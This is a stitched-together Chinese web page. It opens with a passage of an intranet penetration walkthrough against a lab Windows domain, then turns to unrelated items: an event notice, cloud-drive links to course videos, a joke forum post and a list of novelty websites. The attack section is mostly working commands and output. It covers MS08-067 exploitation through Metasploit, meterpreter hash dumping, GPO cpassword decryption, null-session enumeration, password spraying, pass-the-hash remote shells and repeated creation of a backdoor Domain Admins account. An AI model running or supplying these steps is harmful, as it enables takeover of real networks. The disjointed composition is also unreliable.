C:\>net user twadmin $piD3rsRul3! /add /domain net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully. C:\>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu.
3.MS08-067

这个漏洞已经超过4年了,但是内网中还是有很多机器没有打补丁,影响的有(Windows Server 2000, Windows Server 2003, and Windows XP),不过说实话,我内网渗透的过程中很少用MS08-067,因为溢出不好,有可能造成DOS,被人发现了,就不好了,你懂得.
nmap --script=smb-check-vulns.nse -v -v -p 445,139 -iL smb -oA ms08 less ms08.nmap < -- 使用NMAP的smb-check-vulns脚本识别下 ...snip... Nmap scan report for shelob-squared (192.168.1.103) Host is up (0.00042s latency). Scanned at 2013-09-16 21:52:32 CDT for 55s PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:E3:25:78 (VMware) Host script results: | smb-check-vulns: | MS08-067: VULNERABLE <--bingo..有漏洞 | Conficker: Likely CLEAN | SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE | MS06-025: NO SERVICE (the Ras RPC service is inactive) |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive) ...snip...
nmap的NSE脚本是用LUA语言写的,把这些NSE都过一遍,对渗透很有帮助哦,尤其是在LINUX平台,win平台下除了有几种扫描方式利用不了,NSE脚本照样可以用,不过LINUX上默认安装的NMAP版本都比较低了,你不能直接放NSE到目录,注意看库之间的依赖关系,才能利用,上次看wooyun的drops,livers大牛回复我们组的Anthr@X牛的InsightScan.py,说用nse也实现了一个,我只想说,你能偷偷发我一份吗?

接下来,还是用metasploit溢出,不知道对中文系统效果怎么样,我没有试过 =.=
msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.103 RHOST => 192.168.1.103 msf exploit(ms08_067_netapi) > set TARGET 0 TARGET => 0 msf exploit(ms08_067_netapi) > set LHOST 192.168.1.215 LHOST => 192.168.1.215 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.1.103 [*] Meterpreter session 1 opened (192.168.1.215:33354 -> 192.168.1.103:4444) at 2013-09-16 21:54:15 -0500 meterpreter > getsystem ...got system (via technique 1). meterpreter > sysinfo Computer : SHELOB-SQUARED OS : Windows XP (Build 2600, Service Pack 2). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 48c76bfa334c4c21edd1154db541c2c2... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... Frodo:"what do i have" Samwise:"Frodo" Stryder:"love" Legolas:"favorite saying" Gimli:"what am i" Boromir:"what I am" Gandalf:"moria" [*] Dumping password hashes... Administrator:500:f75d090d8564fd334a3b108f3fa6cb6d:3019d5d61cdf713c7b677efefc22f0e5::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:7e8a50750d9a1a30d3d4a83f88ea86ab:6fba9c0f469be01bab209ee2785a818d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:861165412001ece0a5e73ab8863129d8::: Frodo:1003:74052b0fb3d802a3be4db4ed34a95891:a7cee25799f518f9bd886683a13ed6d0::: Samwise:1004:aad3b435b51404eeaad3b435b51404ee:7dff81410af5e2d0c2b6e54a98a8f622::: Stryder:1005:825f8bc99c2a5013e72c57ef50f76a05:1047f0b952cfbffbdd6c34ef6bd610e5::: Legolas:1006:625d787db20f1dd8aad3b435b51404ee:cc5b9f225e569fa3a2534be394df531a::: Gimli:1007:aad3b435b51404eeaad3b435b51404ee:e4d2534368ff0f1cbe2a42c5d79b9818::: Boromir:1008:e3bee25ac9de68cec2cc282901fd62d9:4231db4c15025d1951f3c0d39d8656a2::: Gandalf:1009:20ef2c7725e35c1dbd7cfc62789a58c8:02d0a4d2b6c7d485a935778eb90e0446::: meterpreter > shell Process 2708 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\ WINDOWS\system32>whoami whoami MIRKWOOD\Gandalf C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully. C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully.
4. GPO cpassword

这个原理完全可以看瞌睡龙牛翻译的http://drops.wooyun.org/papers/576,本文中亮点是他从LINUX连接到WIN的,有许多同学不会通过linux渗透WIN域,尤其是在得到一个WEBSHELL,还是ROOT权限,还是跟内网连着,还有个域用户的情况下(=.=现实中哪儿有这么多好的条件让你都碰到了)

smbclient -W MIRKWOOD -U ‘Legolas%orcs’ \\\\192.168.1.105\\SYSVOL < --使用smbclient连接, 支持上传下载 Domain=[ MIRKWOOD] OS=[Windows Server 2008 R2 Standard 7600] Server=[Windows Server 2008 R2 Standard 6.1] smb: \> dir . D 0 Wed Sep 15 15:08:37 2012 .. D 0 Wed Sep 15 15:08:37 2012 mirkwood.local D 0 Wed Sep 15 15:08:37 2012 48457 blocks of size 4194304. 44175 blocks available smb: \> cd mirkwood.local\ smb: \smirkwood.local\> dir . D 0 Wed Sep 15 15:13:05 2012 .. D 0 Wed Sep 15 15:13:05 2012 Policies D 0 Tue Oct 30 10:29:31 2012 scripts D 0 Thu Nov 8 12:50:21 2012 smb:\> recurse smb:\> prompt off smb:\> mget Policies …snip… getting file \mirkwood\Policies\PolicyDefinitions\access32.admx of size 98874 as access32.admx (3657.0 KiloBytes/sec) (average 3657.0 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\access34.admx of size 131924 as access34.admx (27324.5 KiloBytes/sec) (average 7038.2 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\ActiveXInstallService.admx of size 7217 as ActiveXInstallService.admx (2303.1 KiloBytes/sec) (average 6722.5 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AddRmvPrograms.admx of size 7214 as AddRmvPrograms.admx (2301.6 KiloBytes/sec) (average 6446.2 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\asdf.admx of size 4249 as asdf.admx (122.0 KiloBytes/sec) (average 4940.4 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AppCompat.admx of size 4893 as AppCompat.admx (2633.2 KiloBytes/sec) (average 4835.6 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AttachmtMgr.admx of size 3865 as AttachmtMgr.admx (2912.5 KiloBytes/sec) (average 4752.0 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AutoPlay.admx of size 5591 as AutoPlay.admx …snip… smb:\> recurse smb:\> prompt off smb:\> mget scripts …snip… smb: \avi\> mget scripts Get directory scripts? y Get directory bin? y Get file #INCLUDE.BAT? y getting file \ mirkwood \scripts\bin\#INCLUDE.BAT of size 2839 as #INCLUDE.BAT (409.6 KiloBytes/sec) (average 409.7 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON.BAT of size 1438 as NETLOGON.BAT (28.9 KiloBytes/sec) (average 137.7 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON2.BAT of size 16781 as NETLOGON2.BAT (691.0 KiloBytes/sec) (average 566.0 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON3.BAT of size 16486 as NETLOGON3.BAT (1268.5 KiloBytes/sec) (average 773.6 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON4.BAT of size 17429 as NETLOGON4.BAT (1108.7 KiloBytes/sec) (average 858.8 KiloBytes/sec) …snip…
Once the files are downloaded, grep through both policies and scripts for Administrator or cpassword (either would work in this instance):
grep -ri administrator . grep -ri cpassword . ~/work/nmap/192.168.1.0-24/downloads/Policies# grep -ri administrator . ./{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}/Machine/Preferences/Groups/Groups.xml: :
The cpassword is taken and run through the decryption script from http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html.
~/work# ruby decrypt.rb < --解密 Local*P4ssword! ~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\’Administrator%Local*P4ssword!’ --uninstall --system //192.168.1.103 cmd.exe <-- winexe和win下经典工具psexec效果一样一样的 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32> net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully. C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully.

5.NetBIOS Null Enumeration Allowed on Server

其实就是说,域服务器,允许你空会话连接,然后列举账户信息,然后在破解账户,LINUX下用enum4linux.pl遍历用户,用medusa破解帐号,用winexec连接执行命令.WIN下的话,< <黑客大曝光>>查点那章看过木?

~/enum4linux.pl -u Legolas -p orcs -w MIRKWOOD -a 192.168.1.90 >> enum-192.168.1.90 ~/work/targets/192.168.1.0-24# cat enum-192.168.1.90 Starting enum4linux v0.8.7 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 10 10:15:14 2013 ========================== | Target Information | ========================== Target ........... 192.168.1.90 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================== | Enumerating Workgroup/Domain on 192.168.1.90 | =================================================== [+] Got domain/workgroup name: MIRKWOOD =========================================== | Nbtstat Information for 192.168.1.90 | =========================================== Looking up status of 192.168.1.90 MODOR <00> - M Workstation Service MIRKWOOD <00> - M Domain/Workgroup Name MIRKWOOD <1c> - M Domain Controllers MORDOR <20> - M File Server Service MAC Address = B5-AD-2F-37-2G-4F ==================================== | Session Check on 192.168.1.90 | ==================================== [+] Server 192.168.1.90 allows sessions using username '', password '' …snip… ============================ | Users on 192.168.1.90 | ============================ index: 0x2b76 RID: 0xd08 acb: 0x00000610 Account: Administrator Name: Administrator Desc: (null) index: 0x1822 RID: 0xb0a acb: 0x00000414 Account: Frodo Name: Frodo Baggins Desc: (null) index: 0x1bga RID: 0xc0a acb: 0x00080210 Account: Samwise Name: Samwise Gamgee User Desc: (null) index: 0x1dc4 RID: 0xc7a acb: 0x00050210 Account: Stryder Name: Aragorn User Desc: (null) index: 0x1823 RID: 0xb0b acb: 0x00007014 Account: Legolas Name: Legolas Greenleaf Desc: (null) index: 0x1824 RID: 0xb0c acb: 0x00010014 Account: Gimli Name: Gimli son of Glóin Desc: (null) index: 0x1825 RID: 0xb0d acb: 0x00300014 Account: Boromir Name: Boromir son of Denethor II Desc: (null) index: 0x126f RID: 0x9eb acb: 0x00004014 Account: Gandalf Name: Gandalf the Gray Desc: (null) index: 0x1826 RID: 0xb0e acb: 0x00020015 Account: gollum Name: gollum Desc: (null) …snip… ~/work/targets/192.168.1.90# cat enum-192.168.1.90 .txt | grep "Domain Admins" Group 'Administrators' (RID: 544) has member: MIRKWOOD\Domain Admins Group:[Domain Admins] rid:[0x200] Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Gandalf Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Stryder Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Administrator Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \gollum Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Saruman S-1-5-21-8675309254-522963170-1866889882-512 MIRKWOOD \Domain Admins (Domain Group) S-1-5-21-1897573695-8675309227-1212564242-512 MORDOR\Domain Admins (Domain Group) ~/work/nmap/# medusa -M smbnt -H smb -u gollum -p gollum -m GROUP:DOMAIN | tee smb-gollum.medusa ACCOUNT CHECK: [smbnt] Host: 192.168.1.1 (1 of 62, 0 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.1 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (2 of 62, 1 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.100 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [smbnt] Host: 192.168.1.105 (3 of 62, 2 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.105 User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK: [smbnt] Host: 192.168.1.106 (4 of 62, 3 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.106 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [smbnt] Host: 192.168.1.107 (5 of 62, 4 complete) User: ssadmin (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.107 User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK: [smbnt] Host: 192.168.1.11 (7 of 62, 6 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.11 User: gollum Password: gollum [SUCCESS] …snip… ~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\gollum%gollum --uninstall --system //192.168.1.106 cmd.exe Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\ WINDOWS\system32>whoami whoami MIRKWOOD\gollum C:\WINDOWS\system32>> net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully. C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully.
修补方法:[真心不希望管理员看到]

1.少用XP/win2k吧,否则为了某些兼容性,很少能全面禁止Netbios and LLMNR Name Poisoning

2.从知名站点下载软件安装程序,更换软件自带的默认口令

3.勤劳打全系统补丁

4.做好账户审核

5.禁止空会话,关键服务器,做好VLAN划分

各位可爱的小伙伴们,乌云众测要去上海溜达一圈啦~

10月16日(也就是后天),@zeracker 三哥将带着乌云的小伙伴参加安全牛第二届网络空间安全论坛“狙击金融安全新风险”【10.16上海站】,会上,小伙伴还将献上《众测如何助力金融安全》的演讲,欢迎各位踊跃来面基捧场(小龙虾嗨起来!~)

会议时间:2015年10月16日 13:30 ~ 2015年10月16日 17:00

会议地点:(上海静安)上海宏安瑞士大酒店3楼达沃斯厅

这是由小甲鱼录制的全套Python教程,总共97集,分享给大家。

下载地址:链接: http://pan.baidu.com/s/1dDdjpIx 密码: ketw

视频截图:[caption id="attachment_597" align="aligncenter" width="1222"]Python Python[/caption]

一次送女友的时候, 顺带她的闺 蜜,人很好,应该说女友也是人很好类型,非常正经的女孩,可是第一眼看到她闺 蜜就莫名其妙的感觉,虽然知道自己这样做不好,还是总盯着人家眼睛看,眼神对视的一刹那,似乎感觉到什么,这一辈子也没这样对一个女孩一见钟情。。。。。。。。。。。
女友闺 蜜我也能感受到 她也有那种感觉,可是她克制住了,甚至不跟我说话,她觉得这样不好,加了微 信后,我更加彷徨了,看到她朋友圈细腻的文字,不做作,不会拍些无脑自拍照和心灵鸡汤,认真的看每一本年,记录每一个地方,我深深的为之着迷,就这样持续了一个月,我还是今天没克制住,去找了她,大雨天,她出来了。。。低着头,不知为何,感觉她哭过。。。
我很想一把把她搂进怀里,又想到自己那个善良 可爱的女友,又缩了回去,给了她那只她喜欢的流氓熊,强作对我笑了下,看了我一眼,关上了门,只留下我 孤零零的站在门外。
女友那边似乎还不知道这件事,这俩天老找我,我也是爱理不理,心理上很是愧疚。。。。我一个人在雨里走着,,。。。
似乎明白了什么。。
因为 雨水打到我的手上。。
我看见了水。。
对啊
水.........
我又水。了一。贴 !
我连女朋友都没哪来的JB女朋友闺蜜

[caption id="attachment_584" align="aligncenter" width="461"]学习英语 学习英语[/caption][caption id="attachment_585" align="aligncenter" width="1078"]学习英语 学习英语[/caption]

课时1 成人入门直达中级6合1套餐简介试听
课时2 第1.1节 音标的概述 第1.2节 12个单元音音标的读法
课时3 音标 第1.3节 8个双元音音标的读法
课时4 音标 第1.4节 22个单辅音音标的读法
课时5 音标 第1.5节 6个双辅音音标的读法
课时6 音标 第1.6节 辅音连缀
课时7 音标 第1.7节 看音标划音节
课时8 音标 第1.8节 见音能读的训练
课时9 音标 第2.1节 字母与音标的关系
课时10 音标 第2.2节 6个元音字母单独发音规律
课时11 音标 第2.3节 20个单辅音字母的单独发音规律
课时12 音标 第2.4节 辅音字母组合的发音规律
课时13 音标 第2.5节 元音字母组合的发音规律
课时14 音标 第2.6节 看单词划音节
课时15 音标 第2.7节 重读的规律
课时16 音标 第2.8节 见词能读的训练
课时17 音标 第3.1节 12个单元音音标对应的字组
课时18 音标 第3.2节 8个双元音音标对应的字组
课时19 音标 第3.3节 22个单辅音音标对应的字组
课时20 音标 第3.4节 6个双辅音音标对应的字组
课时21 音标 第3.5节 听音能拼的训练
课时22 音标 第4.1节 连读现象
课时23 音标 第4.2节 加音现象
课时24 音标 第4.3节 重叠现象
课时25 音标 第4.4节 失爆现象
课时26 音标 第4.5节 同化现象
课时27 音标 第4.6节 英语语调
课时28 音标 第4.7节 美式发音与英式发音的主要差别
课时29 入门词汇第1节 家庭成员
课时30 入门词汇第2节 人的称呼
课时31 入门词汇第3节 人的职业
课时32 入门词汇第4节 公共场所
课时33 入门词汇第5节 数字名称
课时34 入门词汇第6节 人的身体
课时35 入门词汇第7节 动物植物
课时36 入门词汇第8节 颜色服饰
课时37 入门词汇第9节 房子结构
课时38 入门词汇第10节 家用电器
课时39 入门词汇第11节 自然地理
课时40 入门词汇第12节 世界各国
课时41 入门词汇第13节国家概况
课时42 入门词汇第14节 时间分类
课时43 入门词汇第15节 季节天气
课时44 入门词汇第16节 月份星期
课时45 入门词汇第17节 学校介绍
课时46 入门词汇第18节 学习用品
课时47 入门词汇第19节 教学活动
课时48 入门词汇第20节 日常饮食
课时49 入门词汇第21节 兴趣爱好
课时50 入门词汇第22节 交通工具
课时51 入门词汇第23节 运动健康
课时52 入门词汇第24节 人称代词
课时53 入门词汇第25节 物主代词
课时54 入门词汇第26 反身代词
课时55 入门词汇第27节 不定代词
课时56 入门词汇第28节 疑问代词
课时57 入门词汇第29节 人的外貌
课时58 入门词汇第30节 人的情感
课时59 入门词汇第31节 人的品性
课时60 入门词汇第32节 人的状态
课时61 入门词汇第33节 物的外形
课时62 入门词汇第34节 物的性质
课时63 入门词汇第35节 物的品性
课时64 入门词汇第36节 物的情感
课时65 入门词汇第37节 物的状态
课时66 入门词汇第38节 五官动作
课时67 入门词汇第39节 手的动作
课时68 入门词汇第40节 脚的动作
课时69 入门词汇第41节 脑的动作
课时70 入门词汇第42节 心理动词
课时71 入门词汇第43节 情态动词
课时72 入门词汇第44节 态度动词
课时73 入门词汇第45节 变化动词
课时74 入门词汇第46节 时间副词
课时75 入门词汇第47节 地点副词
课时76 入门词汇第48节 程度副词
课时77 入门词汇第49节 方式副词
课时78 入门词汇第50节 连接副词
课时79 入门词汇第51节 数词模块
课时80 入门词汇第52节 介词模块
课时81 入门词汇第53节 连词模块
课时82 入门词汇第54节 量词模块
课时83 入门语法第1讲 简单句的概述
课时84 入门语法第2讲 一般现在时与写作训练
课时85 入门语法第3讲 一般过去时与写作训练
课时86 入门语法第4讲 一般将来时与写作
课时87 入门语法第5讲 情态动词与写作
课时88 入门语法第6讲 there be句型与写作
课时89 入门语法第7讲 名词的复数与写作
课时90 入门语法第8讲 名词所有格与写作
课时91 入门语法第9讲 人称代词与写作
课时92 入门语法第10讲 物主代词与写作
课时93 入门语法第11讲 反身代词与写作
课时94 入门语法第12讲 指示代词与写作
课时95 入门语法第13讲 不定代词与写作
课时96 入门语法第14讲 基数词与写作
课时97 入门语法第15讲 序数词与写作
课时98 入门语法第16讲 形容词副词基本用语与写作
课时99 入门语法第17讲 形容词副词比较级与写作
课时100 入门语法第18讲 介词与写作
课时101 入门语法第19讲 冠词与写作
课时102 入门语法第20讲 不定式与写作
课时103 入门语法第21讲 动名词与写作
课时104 入门语法第22讲 复合句的概述
课时105 入门语法第23讲 并列句与写作
课时106 入门语法第24讲 宾语从句与写作
课时107 入门语法第25讲 定语从句与写作
课时108 入门语法第26讲 状语从句与写作
课时109 入门语法第27讲 段落的概述
课时110 入门语法第28讲 段落的写作
课时111 入门语法第29讲 段落的评价标准
课时112 入门语法第30讲 文章的概述
课时113 入门语法第31讲 文章的写作步骤
课时114 初级口语第1讲 问候用语
课时115 初级口语第2讲 介绍用语
课时116 初级口语第3讲 致谢用语
课时117 初级口语第4讲 道别用语
课时118 初级口语第5讲 赞美用语
课时119 初级口语第6讲 祝福用语
课时120 初级口语第7讲 邀请用语
课时121 初级口语第8讲 帮忙用语
课时122 初级口语第9节 赞同用语
课时123 初级口语第10节 建议用语
课时124 初级口语第11节 请求用语
课时125 初级口语第12讲 道歉用语
课时126 初级口语第13讲 预约用语
课时127 初级口语第14讲 时间用语
课时128 初级口语第15讲 天气用语
课时129 初级口语第16讲 电话用语
课时130 初级口语第17讲 购物用语
课时131 初级口语第18讲 餐厅用语
课时132 初级口语第19讲 住宿用语
课时133 初级口语第20讲 问路用语
课时134 初级口语第21讲 机场用语
课时135 初级口语 第22讲 海关用语
课时136 初级口语 第23讲 银行用语
课时137 初级口语 第24讲 邮政用语
课时138 初级口语 第25讲 医院用语
课时139 第26讲 求职面试用语
课时140 中级词汇 第1章 A打头词汇
课时141 中级词汇 第2章 B打头词汇
课时142 中级词汇 第3章 C打头词汇
课时143 中级词汇 第4章 D打头词汇
课时144 中级词汇 第5章 E打头词汇
课时145 中级词汇 第6章 F打头词汇
课时146 第7章 GH打头词汇
课时147 中级词汇 第8章 IJK打头词汇
课时148 中级词汇 第9章 LM打头词汇
课时149 中级词汇 第10章 NO打头词汇
课时150 中级词汇 第11章 PQ打头词汇
课时151 中级词汇 第12章 R打头词汇
课时152 第13章 S打头词汇
课时153 第14章 T打头词汇
课时154 中级词汇 第15章 UVW打头词汇
课时155 中级词汇 第16章 XYZ打头词汇
课时156 中级语法第1.0讲 课程简介试听
课时157 中级语法 第1.1讲 句子成分和简单句的概述
课时158 中级语法 第1.2讲 动词的一般现在时
课时159 中级语法 第1.3讲 动词的一般过去时
课时160 中级语法 第1.4讲 动词的一般将来时
课时161 中级语法 第1.5讲 动词的过去将来时
课时162 中级语法 第1.6讲 动词的现在完成时
课时163 中级语法第1.7讲 动词的过去完成时
课时164 中级语法 第1.8节 动词的现在进行时
课时165 中级语法第1.9讲 动词的过去进行时
课时166 中级语法 第1.10讲 动词之情态动词
课时167 中级语法 第1.11讲 动词的被动态
课时168 中级语法 第1.12讲 名词
课时169 中级语法第1.13讲 代词
课时170 中级语法第1.14讲 数词
课时171 中级语法第1.15讲 形容词和副词
课时172 中级语法第1.16讲 介词
课时173 中级语法第1.17讲 冠词
课时174 中级语法第1.18讲 非谓语动词之动名词
课时175 中级语法第1.19讲 非谓语动词之不定式
课时176 中级语法第1.20讲 there be句型
课时177 中级语法第2.1讲 复合句的概述
课时178 中级语法第2.2讲 并列句
课时179 中级语法第2.3讲 宾语从句
课时180 中级语法第2.4讲 定语从句
课时181 中级语法第2.5讲 状语从句
课时182 中级语法第3.1讲 句子的分类
课时183 中级语法第3.2讲 陈述句
课时184 中级语法第3.3讲 疑问句
课时185 第3.4讲 感叹句
课时186 中级语法第3.5讲 祈使句

转存的同时,请留下您的热心!
http://pan.baidu.com/s/1kTtilyZ#path=%252F

[caption id="attachment_579" align="aligncenter" width="779"]美女 共同认为所有[/caption][caption id="attachment_580" align="aligncenter" width="766"]截图截图 截图[/caption]
[caption id="attachment_581" align="aligncenter" width="342"]截图 截图[/caption]
点击生成打开后只能分享到群,如果你要分享给别人那就分享到群后再点转发给别人
链接: http://pan.baidu.com/s/1i3D8h6l 密码: b88h

百度镜子网页: http://www.udiab.net/
左右相反,内容一样涂鸦网站(蜘蛛字):http://www.zefrank.com/scribbler/scribblertoo/
传说蜘蛛网画的原地址,很好玩
煎蛋网:http://jandan.net/
世界各地的稀奇事
看你能在多短时间内打完26 个字母:http://www.gimme5games.com/index.jsp?id=ff
最高纪录是在1.001内敲完了26个字母

时光邮局:http://hi2future.com/
在这个网址你写一封给未来自己或者他人的信,以邮箱的方式,写完信后留下收信时间,到时候就可以通过你留下的邮箱收到这封信
穿帮网:http://www.chinabug.net/ 里面全是一些电视剧的穿帮镜头
按色彩搜索图片:http://www.etsy.com/color.php
只需把鼠标移到不同的位置点击每一种色彩便可得到相应的图片
地球死亡直播 :http://www.breathingearth.net/
在这里可以看到每一个国家出生和死亡人数
超级牛的计算器:http://zh.numberempire.com/
能解决各种数学问题
八个雅鹿 :http://www.bageyalu.com/
史上最山寨搜索引擎
一画换一画:http://www.sketchswap.com/
你画一幅画,提交后,交换一副来自世界某个地方某个人的另一幅画 他们都画得好好阿
AKinator网络天才:http://cn.akinator.com/
在心中想一个人只要是比较出名的问一些问题都能猜出来
几分钟 好看的生活百科:http://www.jifenzhong.com/
非常涨知识
How Far is it to Mars? :http://www.distancetomars.com/
火星到底离我们有多远呢?这个网站会给我们很直观的答案,将地球缩小到100个像素直径,向下移动,你会感受地球到火星的等比距离。
Space Sounds:http://www.spacesounds.com/
虽然只是声音,不够那么立体,但恰恰就是这种方式才更有神秘感。http://网站收录了我们平常从未听到过的外太空的声音,当你闭上眼睛倾听,想象一下那是一个什么样的空间影像,我保证,这是一次不同寻常之旅
死亡时间预测:http://www.deathclock.com/
预测您的死亡时间,通过输入出生日期,选择性别、BMI范围(可以通过页面下方输入身高、体重计算出)、生活态度和是否抽烟,点击查看按钮就可以得出结果。网站建立的主要目的是希望人们更加珍惜时间,珍视生命,努力工作,认真学习,提醒人们生命是多么的短暂
偷窥地球:http://www.flashearth.com/
一个综合了Google earth、微软VE、雅虎地图等多个三维地图数据的网站,只要你的房子不是最近两年盖的,在里面找到你家屋顶应该不成什么问题,选择Bing maps(with labels)这个选项会出现城市的名称
hello everybody: http://www.sorryeverybody.com
自愿道歉网站,比如你有什么对不起谁的,又不想让他知道,你可以写上面,神父会给你回的,中文估计不认识。
永远打不开的网页:http://www.kesonic.com/longest2.htm
试下就知道了,显示无法打开?
记着喝牛奶:http://www.rememberthemilk.com/
记着每天喝牛奶,只要你去登记一下事务安排,等到了时间就会QQ和MSN狂闪、手机作响、新邮件驾到
查英文短语和句子:http://www.jukuu.com/
这个网站我个人觉得很好
史上最长视频:http://www.turbulence.org/Works/1year/performancevideo.php
是记录两个人一年的生活相片的另外一种玩法:
http://www.themanwhofellasleep.com/invisibilia.html
就是把里面的的人物漫画化IQ超人:http://www.iqsuperman.net/
是锻炼你的思维世界最小的网站:
年龄猜想:http://w ww.agegu ess.com/
如果你很在意真实的你在别人眼中的形象,那就提交相片到这里吧,浏览网页的陌生人会告诉你真正看起来有多大……陌生的评价最客观
有些电影不过是烂片:http://www.rottentomatoes.com/
这里评选出的是最烂的片子,并用“一般烂、很烂、超级烂”这样的级别给它们分类。参评作品中甚至还包括了一些电视游戏,显然评委们有些激动了
跳舞:http://b.muglets.com/
我们猜测,叫每个打开此网页的人都哈哈大笑是站长的目的。上传或者选择一个头像,然后选择一个身体,再然后就让这个小兄弟在你的屏幕上不停地跳舞吧
我很烦:http://www.i-am-bored.com/
你很烦,别理你?那哪成,万一你想不开跳楼呢!看看这个网站吧,世界上可不是只有你一个人烦,看看别人是怎么消解无聊的。
Makemebabies:http://www.makemebabies.com/
想和心仪之人生个小孩吗,通过Makemebabies网站,上传自己和对方照片,无需注册就可以生小孩了。当然这个心仪之人不仅仅是自己喜欢的朋友同事,还可以是明星大腕,只要你能提供他们的照片和自己的照片就可以了。
直角显示:http://www.opentopia.com/sunlightmaprect.html
半球显示:http://www.opentopia.com/sunlightmaphemi.html
实时显示昼夜和云层分布图
365日历网:http://www.365rili.com/
365日历网是专业的日历门户网站,您可以在网站查询到各种日历日程信息,包括黄道吉日、农历、黄历、星座运程、体育赛程、打折优惠、电视节目、电影档期、文艺演出、教育培训、旅游活动等。注册后您可以发布自己设计的日历,共享给同事和朋友。您还可以将感兴趣的日历下载到本机使用,下载的日历信息会自动更新保持与网站同步。双击系统时间即可启动
要你命2007:http://www.meebo.com/
一个小暴发户网站,它把Yahoo、Jabber、Gtalk、AIM、ICQ和MSN几款流行的即时通讯软件整合在一起,支持多款软件之间的信息互通,是名副其实的“聊天要你命2007”。
工业设计前线:http://www.yankodesign.com/
不蒙你,这里能找到全球最新的工业产品设计,看了你就知道原来自己的生活质量有多差
streetpeeper:http://streetpeeper.com/
StreetPeeper是全球著名的街拍网站,时尚衣着风格及充满特色的街头文化,从纽约到悉尼,伦敦到巴黎、东京到首尔……通过这里几乎可以看到全世界的时尚风格。

http://mimi.me/
传说古时候,心里藏着秘密的人,会跑到树林里找一个树洞,对着树洞说出秘密,然后用泥巴将树洞填上。现在,您可以把秘密留在这里。
